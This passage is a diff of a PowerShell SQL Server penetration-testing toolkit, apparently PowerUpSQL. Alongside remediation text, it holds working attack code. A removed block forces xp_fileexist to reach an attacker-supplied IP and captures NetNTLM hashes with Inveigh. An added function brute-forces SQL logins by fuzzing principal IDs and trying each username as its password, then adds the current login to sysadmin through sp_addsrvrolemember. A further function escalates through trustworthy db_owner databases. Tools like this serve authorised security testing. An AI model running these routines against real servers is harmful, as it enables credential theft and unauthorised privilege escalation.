\\$AttackerIp\path..." - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_fileexist '\\$AttackerIp\file'" -TimeOut 10 -SuppressVerbose - - # Stop sniffing and print password hashes - Start-Sleep $TimeOut - $null = Stop-Inveigh - Write-Verbose -Message "$Instance : - Stopped sniffing." - - $HashType = '' - $Hash = '' - - [string]$PassCleartext = Get-InveighCleartext - if($PassCleartext) - { - $HashType = 'Cleartext' - $Hash = $PassCleartext - } - - [string]$PassNetNTLMv1 = Get-InveighNTLMv1 - if($PassNetNTLMv1) - { - $HashType = 'NetNTLMv1' - $Hash = $PassNetNTLMv1 - } - - [string]$PassNetNTLMv2 = Get-InveighNTLMv2 - if($PassNetNTLMv2) - { - $HashType = 'NetNTLMv2' - $Hash = $PassNetNTLMv2 - } - - if($Hash) - { - # Update Status - Write-Verbose -Message "$Instance : - Recovered $HashType hash:" - Write-Verbose -Message "$Instance : - $Hash" - $Exploited = 'Yes' - $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" - } - else - { - # Update Status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. xp_fileexist Executed, but no password hash was recovered." - } + # ----------------------------------------------------------------- + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role + # ----------------------------------------------------------------- - # Clear inveigh cache - $null = Clear-Inveigh - } - else - { - Write-Verbose -Message "$Instance : - Inveigh could not be loaded." - # Update status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." - } - } - else + if($Exploit -and $IsExploitable -eq 'Yes') { - # Update status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." + Write-Verbose -Message "$Instance : - No server escalation method is available at this time." } } - else - { - # Update status - $IsExploitable = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." - } } - - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } - - else - { - Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_fileexist." } - - # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" } - - End + else { - # Return data - if ( -not $NoOutput) - { - Return $TblData - } + # Status user + Write-Verbose -Message "$Instance : - The current login doesn't have the CREATE PROCEDURE permission in any databases." } + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } } } + + # --------------------------------------- -# Invoke-SQLAuditPrivDbChaining +# Invoke-SQLAuditWeakLoginPw # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivDbChaining +Function Invoke-SQLAuditWeakLoginPw { <# .SYNOPSIS - Check if data ownership chaining is enabled at the server or databases levels. + Perform dictionary attack for common passwords. By default, it will enumerate + SQL Server logins and the current login and test for "username" as password + for each enumerated login. .PARAMETER Username + Known SQL Server login to obtain a list of logins with for testing. + .PARAMETER TestUsername SQL Server or domain account to authenticate with. + .PARAMETER UserFile + Path to list of users to use. One per line. .PARAMETER Password - SQL Server or domain account password to authenticate with. + Known SQL Server login password to obtain a list of logins with for testing. + .PARAMETER TestPassword + Password to test provided or discovered logins with. + .PARAMETER PassFile + Path to list of password to use. One per line. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER NoDefaults - Don't return information for default databases. - .PARAMETER NoOutput - Don't return output. + .PARAMETER NoUserAsPass + Don't try to login using the login name as the password. + .PARAMETER NoUserEnum + Don't try to enumerate logins to test. + .PARAMETER FuzzNum + The number of Principal IDs to fuzz during blind SQL login enumeration as a least privilege login. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE - PS C:\> Invoke-SQLAuditPrivDbChaining -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditWeakLoginPw -Username myuser -Password mypassword - ComputerName : NETSPI-283-SSU - Instance : NETSPI-283-SSU\STANDARDDEV2014 - Vulnerability : Excessive Privilege - Database Ownership Chaining - Description : Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources. - Remediation : Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used - enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining. - Severity : Low + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : Weak Login Password + Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. + Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. + Severity : High IsVulnerable : Yes - IsExploitable : No + IsExploitable : Yes Exploited : No - ExploitCmd : There is not exploit available at this time. - Details : The database testdb was found configured with ownership chaining enabled. - Reference : https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx + ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. + Details : The testuser (Not Sysadmin) is configured with the password testuser. + Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + + ComputerName : SQLServer1 + Instance : SQLServer1\Express + Vulnerability : Weak Login Password + Description : One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to. + Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. + Severity : High + IsVulnerable : Yes + IsExploitable : Yes + Exploited : No + ExploitCmd : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit. + Details : The testadmin (Sysadmin) is configured with the password testadmin. + Reference : https://msdn.microsoft.com/en-us/library/ms161959.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose + PS C:\> Invoke-SQLAuditWeakLoginPw -Verbose -Instance SQLServer1\STANDARDDEV2014 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'Known SQL Server login to fuzz logins with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'Username to test.')] + [string]$TestUsername = 'sa', + + [Parameter(Mandatory = $false, + HelpMessage = 'Path to list of users to use. One per line.')] + [string]$UserFile, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Known SQL Server password to fuzz logins with.')] [string]$Password, + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server password to attempt to login with.')] + [string]$TestPassword, + + [Parameter(Mandatory = $false, + HelpMessage = 'Path to list of passwords to use. One per line.')] + [string]$PassFile, + + [Parameter(Mandatory = $false, + HelpMessage = 'User is tested as pass by default. This setting disables it.')] + [switch]$NoUserAsPass, + [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] @@ -10794,8 +22025,12 @@ Function Invoke-SQLAuditPrivDbChaining [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'Only select non default databases.')] - [switch]$NoDefaults, + HelpMessage = "Don't attempt to enumerate logins from the server.")] + [switch]$NoUserEnum, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of Principal IDs to fuzz.')] + [string]$FuzzNum = 10000, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] @@ -10828,7 +22063,7 @@ Function Invoke-SQLAuditPrivDbChaining Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Weak Login Password" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -10838,7 +22073,7 @@ Function Invoke-SQLAuditPrivDbChaining { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password." Return } else @@ -10850,6 +22085,7 @@ Function Invoke-SQLAuditPrivDbChaining $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName + $CurrentUSerSysadmin = $ServerInfo.IsSysadmin # -------------------------------------------- # Set function meta data for report output @@ -10862,16 +22098,16 @@ Function Invoke-SQLAuditPrivDbChaining { $TestMode = 'Audit' } - $Vulnerability = 'Excessive Privilege - Database Ownership Chaining' - $Description = 'Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources.' - $Remediation = "Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining." - $Severity = 'Low' + $Vulnerability = 'Weak Login Password' + $Description = 'One or more SQL Server logins is configured with a weak password. This may provide unauthorized access to resources the affected logins have access to.' + $Remediation = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.' + $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = 'There is not exploit available at this time.' + $ExploitCmd = 'Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.' $Details = '' - $Reference = 'https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx ' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms161959.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- @@ -10879,50 +22115,256 @@ Function Invoke-SQLAuditPrivDbChaining # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # Select links configured with static credentials + # Create empty user / password lists + $LoginList = @() + $PasswordList = @() - if($NoDefaults) + # Get logins for testing - file + if($UserFile) { - $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoDefaults -SuppressVerbose | Where-Object -FilterScript { - $_.is_db_chaining_on -eq 'True' + Write-Verbose -Message "$Instance - Getting logins from file..." + Get-Content -Path $UserFile | + ForEach-Object -Process { + $LoginList += $_ } } - else + + # Get logins for testing - variable + if($TestUsername) { - $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.is_db_chaining_on -eq 'True' + Write-Verbose -Message "$Instance - Getting supplied login..." + $LoginList += $TestUsername + } + + # Get logins for testing - fuzzed + if(-not $NoUserEnum) + { + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + # Check if sysadmin + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin -eq 'Yes') + { + # Query for logins + Write-Verbose -Message "$Instance - Getting list of logins..." + Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | + Where-Object -FilterScript { + $_.PrincipalType -eq 'SQL_LOGIN' + } | + Select-Object -Property PrincipalName -ExpandProperty PrincipalName | + ForEach-Object -Process { + $LoginList += $_ + } + } + else + { + # Fuzz logins + Write-Verbose -Message "$Instance : Enumerating principal names from $FuzzNum principal IDs.." + Get-SQLFuzzServerLogin -Instance $Instance -GetPrincipalType -Username $Username -Password $Password -Credential $Credential -FuzzNum $FuzzNum -SuppressVerbose | + Where-Object -FilterScript { + $_.PrincipleType -eq 'SQL Login' + } | + Select-Object -Property PrincipleName -ExpandProperty PrincipleName | + ForEach-Object -Process { + $LoginList += $_ + } + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance - Connection Failed - Could not authenticate with provided credentials." + } + return + } + } + + # Check for users or return - count array + if($LoginList.count -eq 0 -and (-not $FuzzLogins)) + { + Write-Verbose -Message "$Instance - No logins have been provided." + return + } + + # Get passwords for testing - file + if($PassFile) + { + Write-Verbose -Message "$Instance - Getting password from file..." + Get-Content -Path $PassFile | + ForEach-Object -Process { + $PasswordList += $_ + } + } + + # Get passwords for testing - variable + if($TestPassword) + { + Write-Verbose -Message "$Instance - Getting supplied password..." + $PasswordList += $TestPassword + } + + # Check for provided passwords + if($PasswordList.count -eq 0 -and ($NoUserAsPass)) + { + Write-Verbose -Message "$Instance - No passwords have been provided." + return + } + + # Iternate through logins and perform dictionary attack + Write-Verbose -Message "$Instance - Performing dictionary attack..." + $LoginList | + Select-Object -Unique | + ForEach-Object -Process { + $TargetLogin = $_ + $PasswordList | + Select-Object -Unique | + ForEach-Object -Process { + $TargetPassword = $_ + + $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | + Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestPass) + { + # Check if guess credential is a sysadmin + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetPassword -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin -eq 'Yes') + { + $SysadminStatus = 'Sysadmin' + } + else + { + $SysadminStatus = 'Not Sysadmin' + } + + Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetPassword" + + if($Exploit) + { + Write-Verbose -Message "$Instance - Trying to make you a sysadmin..." + + # Check if the current login is a sysadmin + $IsSysadmin1 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin1 -eq 'Yes') + { + Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." + } + else + { + Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." + + # Add current user as sysadmin if login was successful + Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetPassword -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose + + # Check if the current login is a sysadmin again + $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin2 -eq 'Yes') + { + $Exploited = 'Yes' + Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." + } + else + { + $Exploited = 'No' + Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." + } + } + } + + # Add record + $Details = "The $TargetLogin ($SysadminStatus) is configured with the password $TargetPassword." + $IsVulnerable = 'Yes' + $IsExploitable = 'Yes' + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + else + { + Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetPassword" + } } } - # Update vulnerable status - if($ChainDatabases) - { - $IsVulnerable = 'Yes' - $ChainDatabases | - ForEach-Object -Process { - $DatabaseName = $_.DatabaseName + # Test user as pass + if(-not $NoUserAsPass) + { + $LoginList | + Select-Object -Unique | + ForEach-Object -Process { + $TargetLogin = $_ + $TestPass = Get-SQLConnectionTest -Instance $Instance -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | + Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestPass) + { + # Check if user/name combo has sysadmin + $IsSysadmin3 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $TargetLogin -Password $TargetLogin -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin3 -eq 'Yes') + { + $SysadminStatus = 'Sysadmin' + } + else + { + $SysadminStatus = 'Not Sysadmin' + } + + Write-Verbose -Message "$Instance - Successful Login: User = $TargetLogin ($SysadminStatus) Password = $TargetLogin" + + if(($Exploit) -and $IsSysadmin3 -eq 'Yes') + { + # Check if the current login is a sysadmin + $IsSysadmin4 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin4 -eq 'Yes') + { + Write-Verbose -Message "$Instance - You're already a sysadmin. Nothing to do." + } + else + { + Write-Verbose -Message "$Instance - You're not currently a sysadmin. Let's change that..." + + # Add current user as sysadmin if login was successful + Get-SQLQuery -Instance $Instance -Username $TargetLogin -Password $TargetLogin -Credential $Credential -Query "EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'" -SuppressVerbose - Write-Verbose -Message "$Instance : - The database $DatabaseName was found configured as trustworthy." - $Details = "The database $DatabaseName was found configured with ownership chaining enabled." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + # Check if the current login is a sysadmin again + $IsSysadmin5 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | + Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin5 -eq 'Yes') + { + $Exploited = 'Yes' + Write-Verbose -Message "$Instance - SUCCESS! You're a sysadmin now." + } + else + { + $Exploited = 'No' + Write-Verbose -Message "$Instance - Fail. We coudn't add you as a sysadmin." + } + } + } + + # Add record + $Details = "The $TargetLogin ($SysadminStatus) principal is configured with the password $TargetLogin." + $IsVulnerable = 'Yes' + $IsExploitable = 'Yes' + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + else + { + Write-Verbose -Message "$Instance - Failed Login: User = $TargetLogin Password = $TargetLogin" + } } } - else - { - Write-Verbose -Message "$Instance : - No non-default databases were found with ownership chaining enabled." - } - # Check for server wide setting - $ServerCheck = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Name -like '*chain*' -and $_.config_value -eq 1 - } - if($ServerCheck) - { - $IsVulnerable = 'Yes' - Write-Verbose -Message "$Instance : - The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." - $Details = "The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) - } # ----------------------------------------------------------------- # Check for exploit dependancies @@ -10936,13 +22378,10 @@ Function Invoke-SQLAuditPrivDbChaining # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- - # $Exploited = "No" or $Exploited = "Yes" - # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') - # Also, recommend link crawler module - + # $Exploited = "No" or $Exploited = "Yes" - check if login is a sysadmin # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Weak Login Password" } End @@ -10950,21 +22389,21 @@ Function Invoke-SQLAuditPrivDbChaining # Return data if ( -not $NoOutput) { - Return $TblData + Return $TblData | Sort-Object -Property computername, instance, details } } } # --------------------------------------- -# Invoke-SQLAuditPrivCreateProcedure +# Invoke-SQLAuditRoleDbOwner # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivCreateProcedure +Function Invoke-SQLAuditRoleDbOwner { <# .SYNOPSIS - Check if the current login has the CREATE PROCEDURE permission. Attempt to leverage to obtain sysadmin privileges. + Check if the current login has the db_owner role in any databases. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -10973,27 +22412,28 @@ Function Invoke-SQLAuditPrivCreateProcedure SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER NoOutput - Don't output anything. .PARAMETER Exploit - Exploit vulnerable issues + Exploit vulnerable issues. .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditPrivCreateProcedure -Username evil -Password Password123! + PS C:\> Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : PERMISSION - CREATE PROCEDURE - Description : The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database. - Remediation : If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a - command like: REVOKE CREATE PROCEDURE TO user. + Vulnerability : DATABASE ROLE - DB_OWNER + Description : The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and + owned by a sysadmin. + Remediation : If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with + a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser' Severity : Medium IsVulnerable : Yes - IsExploitable : No + IsExploitable : Yes Exploited : No - ExploitCmd : No exploit is currently available that will allow evil to become a sysadmin. - Details : The evil principal has the CREATE PROCEDURE permission in the testdb database. - Reference : https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396 + ExploitCmd : Invoke-SQLAuditRoleDbOwner -Instance SQLServer1\STANDARDDEV2014 -Username myuser -Password mypassword -Exploit + Details : myuser has the DB_OWNER role in the testdb database. + Reference : https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditRoleDbOwner -Verbose #> [CmdletBinding()] Param( @@ -11049,7 +22489,7 @@ Function Invoke-SQLAuditPrivCreateProcedure Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -11059,7 +22499,7 @@ Function Invoke-SQLAuditPrivCreateProcedure { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED" - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: DATABASE ROLE - DB_OWNER" Return } else @@ -11071,12 +22511,11 @@ Function Invoke-SQLAuditPrivCreateProcedure $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin - $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose + $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' - $CurrentLoginRoles | - ForEach-Object -Process { + $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } @@ -11091,17 +22530,24 @@ Function Invoke-SQLAuditPrivCreateProcedure { $TestMode = 'Audit' } - $Vulnerability = 'PERMISSION - CREATE PROCEDURE' - $Description = 'The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database.' - $Remediation = 'If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user' + $Vulnerability = 'DATABASE ROLE - DB_OWNER' + $Description = 'The login has the DB_OWER role in one or more databases. This may allow the login to escalate privileges to sysadmin if the affected databases are trusted and owned by a sysadmin.' + $Remediation = "If the permission is not required remove it. Permissions are granted with a command like: EXEC sp_addrolemember 'DB_OWNER', 'MyDbUser', and can be removed with a command like: EXEC sp_droprolemember 'DB_OWNER', 'MyDbUser'" $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = "No exploit is currently available that will allow $CurrentLogin to become a sysadmin." + if($Username) + { + $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Username $Username -Password $Password -Exploit" + } + else + { + $ExploitCmd = "Invoke-SQLAuditRoleDbOwner -Instance $Instance -Exploit" + } $Details = '' - $Dependancies = '' - $Reference = 'https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396' + $Dependancies = 'Affected databases must be owned by a sysadmin and be trusted.' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms189121.aspx,https://msdn.microsoft.com/en-us/library/ms187861.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- @@ -11109,71 +22555,110 @@ Function Invoke-SQLAuditPrivCreateProcedure # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # Get all CREATE PROCEDURE grant permissions for all accessible databases - $Permissions = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -SuppressVerbose | Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'CREATE PROCEDURE' + # Iterate through each current login and their associated roles + $CurrentPrincpalList| + ForEach-Object -Process { + # Check if login or role has the DB_OWNER roles in any databases + $DBOWNER = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -RolePrincipalName DB_OWNER -PrincipalName $_ -SuppressVerbose - if($Permissions) - { - # Iterate through each current login and their associated roles - $CurrentPrincpalList| - ForEach-Object -Process { - # Check if they have the CREATE PROCEDURE grant - $CurrentPrincipal = $_ - $Permissions | + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + + # Check for db ownerships + if($DBOWNER) + { + # Add an entry for each database where the user has the db_owner role + $DBOWNER| ForEach-Object -Process { - $AffectedPrincipal = $_.PrincipalName - $AffectedDatabase = $_.DatabaseName + $DatabaseTarget = $_.DatabaseName + $PrincipalTarget = $_.PrincipalName - if($AffectedPrincipal -eq $CurrentPrincipal) + Write-Verbose -Message "$Instance : - $PrincipalTarget has the DB_OWNER role in the $DatabaseTarget database." + $IsVulnerable = 'Yes' + + # Check if associated database is trusted and the owner is a sysadmin + $Depends = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseTarget -SuppressVerbose | Where-Object -FilterScript { + $_.is_trustworthy_on -eq 1 -and $_.OwnerIsSysadmin -eq 1 + } + + if($Depends) { - # Set flag to vulnerable - $IsVulnerable = 'Yes' - Write-Verbose -Message "$Instance : - The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." - $Details = "The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." + $IsExploitable = 'Yes' + Write-Verbose -Message "$Instance : - The $DatabaseTarget database is set as trustworthy and is owned by a sysadmin. This is exploitable." # ----------------------------------------------------------------- - # Check for exploit dependancies - # Note: Typically secondary configs required for dba/os execution + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- - $HasAlterSchema = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'ALTER' -PermissionType 'SCHEMA' -PrincipalName $CurrentPrincipal -DatabaseName $AffectedDatabase -SuppressVerbose - if($HasAlterSchema) + if($Exploit) { - $IsExploitable = 'Yes' - $Dependancies = " $CurrentPrincipal also has ALTER SCHEMA permissions so procedures can be created." - Write-Verbose -Message "$Instance : - Dependancies were met: $CurrentPrincipal has ALTER SCHEMA permissions." + # Check if user is already a sysadmin + $SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status + if($SysadminPreCheck -ne 1) + { + # Status user + Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin." + Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role by 